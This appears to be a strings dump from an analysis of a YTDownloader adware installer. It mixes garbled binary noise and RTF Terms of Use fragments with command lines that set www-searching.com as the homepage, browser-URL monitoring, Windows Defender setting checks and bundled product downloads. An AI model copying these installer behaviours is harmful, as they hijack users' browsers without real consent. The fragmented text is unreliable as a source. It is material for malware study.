MBMBBBBBB??????.B??.7c.77.LELL7LEEEL7E

,,****,*

MBMB??BBB???????...??777..LLEL7LAEEcAAATT

,**,,****

B???...7.7.777LLLL7ELAAAAAATAA

BB?.??.....?..LLLELEAAcEAEET

    #    #

B??BBMBB???BB....7777L7.LAATTELE

111111111

11111111111

BBMB?BB????...777.LLLL7LLAET

BB?.?.BBB???...LL7.77LLEEEEELTTTT

RRVVw%%X

#  #1111

BB??..77.7777.777EAEELELET

1111111

11111111

B??BB??..?..7..7L..LLLL

B??B?.B?......?..7.LL7LL

B??.?......LLL..

BB.....77.7LLL..LLEE

MBB??????.7.77.777L

MMBMMB..????....777.LEEE

??7.7.LLLL7LETL

8888888

BB.BB?........L77L

BMMB?B?....777.7.7.EEL

BBB.?B.77.......ETEE

BB.BB........7LLETTT

88888888

B???BB..BB?..7LLLT

BB.??BB..BB..7777L

B???????BB.?...LLLL7

BMB..BB.7.ELLLL77L

BBB??BB.?.LLLL77.

888888888

MBB?....B...cLLLLLLT

___&_&&&

__&&____&

____&___&&

____&__&_&

BM?.BBB?....777L

&&____&__&&__&&____

_&_&&_&&

.njm4tyyxwwwwxyytm3k.

\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author udif}{\operator Edith}{\creatim\yr2013\mo10\dy22\hr16\min58}{\revtim\yr2014\mo8\dy24\hr14\min26}{\version5}{\edmins16}{\nofpages4}

{\nofwords2316}{\nofchars13206}{\nofcharsws15492}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1501\margr1502\margt1440\margb1440\gutter0\ltrsect

The following license and terms of use (jointly: "Terms of Use") govern your access and use of the YTDownloader.com website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and

ll Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, tools and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally b

ive websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of Use limit our liability and that we do not provide warranties for YTDownloader or contents. It also limits your remedies.}{\rtlch\fcs1

lely for your private and personal purposes and always in accordance with the Terms and Use and the applicable law. Any other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons

is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or otherwise act in a way that interferes with other users\rquote

verse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents or materials on or received via YTDownloader without our prior written consent. You also agree to not remove, obscure, or alter any copyrig

TDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update the YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exerc

\~}{\field{\*\fldinst {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 HYPERLINK "mailto:}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect

the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own discretion and at your own ri

\par }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid1449721\charrsid1449721 YTDownloader includes certain marks, graphics, logos, page headers,

, licensors, suppliers and their respective directors, employees, agents a}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid3632102 nd shareholders (jointly: the "}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

s to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warranties and liability regarding the accuracy, completeness, security, reliability, timelin

ss, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties, so the above exclusions in whole or in part may not apply to you in your country or j

nder applicable law, in no event shall the Goobzo parties be liable for any damage whatsoever including but not limited to any direct, indirect, consequential, special, exemplary, punitive or incidental damages (including but not limited to damages for lo

s of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, contract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointl

urisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your country or jurisdiction and in such case the aggregate liability of the Goobzo parties shall

responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses caused by such member.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

You may create links to this Site from other websites in as much as it is clear that we do not endorse you or your activity, business, products or services and that you and us are not affiliated in any way.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect\linex0\headery708\footery708\colsx708\endnhere\sectlinegrid360\sectdefaultcl\sectrsid8879180\sftnbj {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\sbasedon0 \snext17 \sunhideused \styrsid5573618 Normal (Web);}{\*\cs18 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \sbasedon10 \spriority0 \styrsid5573618 apple-converted-space;}{\*\cs19 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \ul\cf2

\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author Edith}{\operator Edith}{\creatim\yr2014\mo3\dy24\hr8\min26}{\revtim\yr2014\mo10\dy27\hr12}{\version22}{\edmins1585}{\nofpages3}{\nofwords2318}

{\nofchars13216}{\nofcharsws15503}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1800\margr1800\margt568\margb1440\gutter0\ltrsect

\b\f40\fs16\insrsid11944020\charrsid14186020 \line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid14186020 1. Acceptance of Terms of Use\line The following license and terms of use (jointly: "Terms of Use") go}{\rtlch\fcs1

website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and all Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, t

ols and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally binding agreement between you, ("you", "visitor" and/or "user"), and Goobzo Ltd. and its affiliates and subsidiaries

r or parts thereof at our sole discretion and without liability. The products and services described on YTDownloader (and their respective websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of U

ny other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or o

py, modify, adapt, distribute, transmit, translate, display or otherwise exploit YTDownloader and you shall not try to reverse engineer, reverse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents

ith or through the Site. We reserve all rights not expressly granted in and to the Site. We reserve the right to terminate your access to YTDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update th

YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exercise our right to modify or terminate access to the YTDownloader service. Unless explicitly stated otherwise, any new

[email protected]}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3606027 " }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3886136 {\*\datafield

0000a5ab0000}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid3606027\charrsid2648633 [email protected]}}}\sectd \ltrsect

looking statements made on the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own di

\f40\fs16\cf1\insrsid11944020\charrsid14186020 . Trademarks\line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid425254 YTDownloader includes certain mark

and personal use only with no warranties whatsoever. Goobzo, its affiliates, partners, licensors, suppliers and their respective directors, employees, agents and shareholders (jointly: the " Goobzo parties") do not assume any liability whatsoever and disc

loader and included services and contents, including, without limitation, warranties as to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warrant

es and liability regarding the accuracy, completeness, security, reliability, timeliness, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties,

, exemplary, punitive or incidental damages (including but not limited to damages for loss of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, co

tract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointly or separately, have been advised of the possibility of such damages or loss. Such limitation of liability shall also apply whether the damages arise from use, misuse

t of personal injury or death arising from the negligence of Goobzo. Some countries and jurisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your cou

While these limitations of liability provisions use the Goobzo parties definition, the responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses ca

\par 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid14186020 . Links to this Site\line You may create links to this Site from other websites in a

Failure or delay of Goobzo exercise any right, power or remedy under or to require or enforce strict performance by you of any provision of th

\ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 HYPERLINK "mailto:[email protected]" }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 {\*\datafield

0000a5ab00000066000100d9}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid11944020\charrsid413544 [email protected]}}}\sectd \ltrsect

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Top of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Bottom of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 Normal (Web);\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Acronym;

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Keyboard;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Preformatted;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Sample;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Typewriter;

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

?/?6?<?_?

9":(:,:0:4:

<*=/=9=|=

3#3'3 3/333

9Ÿ:u:

5%5S5

8 8$8(8,8084888<8@8

5 5$5(5,5

4 4$4(4,404

: :(:0:8:

>4?8?<?@?

<$<,<4<<<

= =@=`=|=

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Invalid parameter or key doesn't exist.

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.

%s %s Error Report

CrashSender.exe is not found in the specified path.

crashrpt_lang.ini

l%s\CrashRpt\UnsentCrashReports\%s_%s

Couldn't create crash report directory.

Couldn't set C   exception handlers for main execution thread.

Couldn't launch CrashSender.exe process.

%s-tmp

Local\CrashRptEvent_%s_2

The operation was cancelled by client.

Error launching CrashSender.exe

%s has stopped working

Invalid registry key or invalid destination file is specified.

HKEY_LOCAL_MACHINE\

HKEY_CURRENT_USER\

Empty subkey is not allowed.

The registry key coudn't be open.

Local\CrashRptEvent_%s

%s\%s_%s\%s

%u.%u.%u.%u

chrome.exe

iexplore.exe

firefox.exe

safari.exe

opera.exe

explorer.exe

chrome

firefox

opera

@Google Chrome

Chrome_WidgetWin_1

chrome://settings-frame/#syi516

ChromeGetUrl::Initialize ReRun

ChromeGetUrl Done

ChromeGetUrl::BuildChromeHandles found window class name: %s

ChromeGetUrl::BuildChromeHandles HWNDS: %s

ChromeGetUrl::BuildChromeHandles Could not find Chrome windows, exiting..

%d secs

Name - %s

Value - %s

https

URL: %s changed to: %s

Adding URL:

Adding URL: %s

@Firefox

FirefoxBrowserWindow Found button window, 0x%x

FirefoxBrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

@Opera

OperaBrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

SafariBrowserWindow Found browser window, 0x%x

ESOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

GetModule failed. Err=%d

OpenProcess failed. Err=%d

JCertGetNameString failed.

CryptDecodeObject failed with %x

CryptQueryObject failed with %x

CryptMsgGetParam failed with %x

Program Name : %s

Publisher Link : %s

MoreInfo Link : %s

CertFindCertificateInStore failed with %x

CBOT_Condition::IsToInstall Return %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Work] TID=%X

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

Your %s is almost ready for use.

Click YES on the next screen to allow %s to complete integration.

wevtapi.dll

%SystemRoot%\System32\Winevt\Logs\Application.evtx

Event / System[EventID = %d] /Provider[@Name='MsiInstaller']

EvtRender failed with %d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

%ddd

SB_TASK_%d

CreateTask: Query IExecAction failed

RUNONCE_%d

PT%dS

d-d-dTd:d:d

PT%dH

; UnelevateExecutable: Initialize failed

UNELEVATE_%d

; UnelevateExecutable: CreateTask failed

; UnelevateExecutable: RegisterOnceTask failed

; UnelevateExecutable: Task is still not running after 30 seconds. Task state = %d

%d.%d.%d.%d

Windows NT 6.1

Install.log

@REGKEY

.ReturnCode

cr.exe

%%SBDATE%%

%%SID%%

%%SUB%%

%%FULL_SUB%%

GetXml - Magnet is empty: %s

&ver=%s&are=%s&qre=%s&avre=%s&kbd=%s&tz=%s&pp=%s

GetFile - Failed to connect (Err=%d): %s

GetFile - Failed to connect: %s

GetFile - Get Failed (Err=%d): %s

GetFile - Get Failed: %s

GetFile - Read data Failed (Err=%d): %s

GetFile - Read data failed: %s

Failed to create process file (%x).

Mtx%d

Windows NT 5.1

Windows NT 6.2

Windows NT 6.0

Windows NT 5.0

?prd=%s&aff=%s&ver=%s&rnd=%d&tss=%d&action=%s&actionparam=%s&usid=%s

/p.ashx

Sock_Ping : getaddrinfo error = %d

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko; SBUA) Chrome/28.0.1500.95 Safari/537.36

GET %s HTTP/1.1

Host: %s

User-Agent: %s

close failed with error: %d

/S /PING /Action=%s /ActionParams=%s /PingParams=%s

/S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

ScheduleDownload Initialize Failed: %s

ScheduleDownload CreateTask Failed: %s

Start time: %s. End time: %s.

ScheduleDownload RegisterDailyTask Failed: %s

ScheduleInstaller Initialize Failed: %s

ScheduleInstaller CreateTask Failed: %s

ScheduleInstaller RegisterDailyTask Failed: %s

DeleteScheduleDownload Initialize Failed: %s

DeleteScheduleDownload DeleteTask Failed: %s

\Installer\Install%s_%ld

ShellExecute:

Second shellExecute:

RunAsAdmin failed : shell execute failed

HKEY_LOCAL_MACHINE64

Windows Vista

Windows Server 2008

Windows 7

Windows 8

Windows Server 2008 R2

Web Server Edition

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Web Edition

Windows XP

Windows 2000

(build %d)

FWCMD

GetTimeZoneInformation failed error %d

CInstallerUtils::AccessRegistryKeyValue64Bit Error opening key

CInstallerUtils::AccessRegistryKeyValue64Bit Could not read registry value

SOFTWARE\Microsoft\Windows NT\CurrentVersion

d/d/%d d:d

%d seconds

SUCCESSKEY

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

REPORT

TSMtx%d

%s /SECONDSTAGE /Mutex=%s /PIXGUID=%s

Error creating shared memory. Err=%d

Error running file: %s

Timeout expired (%d)

Error opening mutex. Err=%d

Return code = %d

Error reading return code. Err=%d

dfb5uyoqjsg4c.cloudfront.net

d1cfk8e4o0c4u2.cloudfront.net

d1vw44q53d84jx.cloudfront.net

Kernel32.dll

Error %d

ACUrl:

ProxyUrl:

ProxyBypass:

Bkernel32.dll

HKEY_USERS

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

BRWURLS

CInstallMgr::Work, exception: %s

KEYBOARD

XML is incorrect. Xml size=%d. Xml= %s

XML is incorrect. Xml size=%d. Plain Xml= %s

XML %s

bxsdk32.dll

Failed to download bxsdk dll. Error=%d

MINVERURL

REPORT_PROG

/S /REPORT /NUM=%d /AFF=%s

PINGURL

Incorrect xml - No products Node. Xml size=%d

ALTURL

REGKEY

AFFREGKEY

OCSetupHlp.dll

OC_KEY

IMAGE_URL

Cur ver %s, min ver %s

/ENC /S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

%d of 1

%d of %d

CInstallMgr::ReportSize

Schedule report failed

SOFTWARE\Microsoft\Windows Defender\Real-Time Protection

SOFTWARE\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction

SOFTWARE\Microsoft\Windows Defender\Signature Updates

SignatureVersion: %s ; RealTimeDisabled %d DownloadDisabled %d RunningDisabled %d ; DefActionSevere %d DefActionHigh %d DefActionMedium %d DefActionLow %d

OpenCandy init failed. Error=%d. Dll path=%s

Failed to download OpenCandy dll. Error=%d

Waited %d seconds

%%successProd%%

%úiledProd%%

Install %s

Set and keep www-searching.com my default search and homepage

By clicking Install, you agree to the <a href="hXXp://VVV.ytdownloader.com/legal/privacy/">Privacy Policy</a> and <a href="hXXp://VVV.ytdownloader.com/legal/terms/">Terms of Service</a>

Link %s

Client for product key 1 loaded.

Client for product key 2 loaded.

Recommended by %s

<a href="%s" id="TOS %s">Terms of Service</a>

<a href="%s" id="Privacy %s">Privacy Policy</a>

Offer %d: Title: %s; Description: %s

Offer %d, Result %d

Exception CHttpDownload::GetNextRange for URL %s

CHttpDownload::Open handle %d to file %s

Failed to open file %s, error = %d

__ERROR CHttpDownload::Read failed for file %s

CHttpDownload::Repot Bytes %I64d ,Total %I64d, by Downloader %d

Range=%I64d RangeReadBytes=%I64d connection %d Error %x

RedownloadRange %s err = %d headers=%s

CHttpDownload::RedownloadRange for URL %s

%sid=%d_r=%lld_err=%d

CHttpDownload::ReportError for URL %s

CHttpDownload::GetNextRange for URL %s

Get Failed : connection %d err %s (0x%X)

CHttpDownload::DownloadNextRange for URL %s

CHttpDownload::Close handle %d to file %s

CHttpDownload::NOT Close handle %d to file %s

CHttpDownload::Work for URL %s

PRESUCCESSKEY

DOWNLOAD START: %s

Download in virtual mode product: %s

Download Failed to createCHttpDownload:

Download Failed to createCHttpDownload: %s

Download - Failed to connect: %s

Download - Get Failed: %s

Http Reply code = %d

Download Failed to create downloaders list: %s

CProductInstaller::Get for product: %s, exception: %s

CProductInstaller::GetNextRange - No Next Range for product %s

CProductInstaller::GetNextRange - product %s start=%I64d end=%I64d size=%I64d

CProductInstaller::Close for Product %s

DownloadMultiConnection:file %s exists on disk %s

DownloadOneConnection FromScheduler : %s

DownloadOneConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadOneConnection): err=%s (0x%X)

Success %s FileSize= %I64d

DownloadMultiConnection FromScheduler : %s

DownloadMultiConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadMultiConnection): err=%s (0x%X)

INSTALL START: %s

/aff=%s /rnd=%d

/rnd=%d

CProductInstaller::InstallProduct for Product %s

DOWNLOAD BYTES: %s NumOfBytes = %I64d

DOWNLOAD NOT COMPLETED: %s

Trying One Connection Fallback: %s

Download failed, error (%x), %s - Trying Multiple Connection Fallback

RunFromScheduler: Trying Main Connection Fallback: %s

Trying main URL in one Connection %s %s

Trying Alternative Connection Fallback: %s

Alternative Connection %s %s

Alternative Connection Failed: %s

Download failed, error (%x), %s %s

Download failed, error (%x), %s

CProductInstaller::OnDownloadNotCompleted for Product %s

OnDownloadCompleted: %s, exiting status %d

status %d, id %d, total bytes %I64d, file size %I64d, %s

DOWNLOAD END: %s %s

%s, %d

DOWNLOAD END: Not all completed %s

%s FileSize= %I64d

CProductInstaller::OnDownloadCompleted for Product %s

INSTALL BEGIN: %s

INSTALL END: %s

CProductInstaller::OnInstallCompleted for Product %s

Install failed, error: %s

%s: %s

CProductInstaller::OnInstallNotCompleted for Product %s

%s - %s

SkipInstall - %s

/S /SCHEDULE /MAG=%s /pn=%s /pixGuid=%s /sub=%s /Reason=%s

CProductInstaller::AddToScheduler for Product %s

CProductInstaller::RemoveFromScheduler for Product %s

RESUCCESSKEY

%s:%s

UI screen timeout - %s

CRandomCondition::IsToInstall value = %s

CRandomCondition::IsToInstall mode result = %d

%d:%d

CRandomCondition::IsToInstall Return %d

CCMDLINE

YTDi 1.0.0.1

1.0.0.1

CrashRpt YTDi 1.0.0.1 Error Report

/INSTALL /dir=%s /products=%s

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

WAdvapi32.dll

By clicking Next, you agree to install %s and agree to the <a id="TOS" href="%s">Terms of Service</a> and <a id="Privacy" href="%s">Privacy Policy</a>.

%s:%s;

RICHED20.DLL

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

D%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

<d/d/%d d:d:d::d 0x%X>

the %s <a href="%s">Terms</a> and <a href="%s">Privacy Policy</a>

@%s?e=%s

zvl=%s&

File open error %d. File=%s

File size is 0. File=%s

Buffer allocation error %d

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

c:\%original file name%.exe

2.8.0.999

ins_smk.exe_1136:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp3.tmp\nsExec.dll

SMUninstall.exe

rObject.dll

, /urlset=searching /remote /setie /aff=amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp3.tmp\nsExec.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp3.tmp

on\App Paths\smu.exe

-ae0d-57b7b591d16f, /urlset=searching /remote /setie /aff=amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

hXXp://VVV.usertrust.com1

1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl0t

1hXXp://crt.usertrust.com/UTNAddTrustObject_CA.crt0%

hXXp://ocsp.usertrust.com0

hXXps://secure.comodo.net/CPS0A

0hXXp://crl.comodoca.com/COMODOCodeSigningCA2.crl0r

0hXXp://crt.comodoca.com/COMODOCodeSigningCA2.crt0$

hXXp://ocsp.comodoca.com0

1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05

.reloc

SShL0

PeekNamedPipe

CreatePipe

nsExec.dll

:":2:7:@:

`.rsrc

@.reloc

lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet

v2.0.50727

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn4.tmp

nsn4.tmp

datePlus\smu.exe" /install /pin:1 "/s:F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f," "/is:1" "/it:1" "/ih:1" "/ei:1" "/ci:1" "/fi:1" "/oi:1" "/urlset:searching""

/db=all /is=1 /ih=1 /sparam=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f, /urlset=searching /remote /setie /aff=amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f,

e /S /db=all /is=1 /ih=1 /sparam=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f, /urlset=searching /remote /setie /aff=amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

et=searching /remote /setie /aff=amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f,

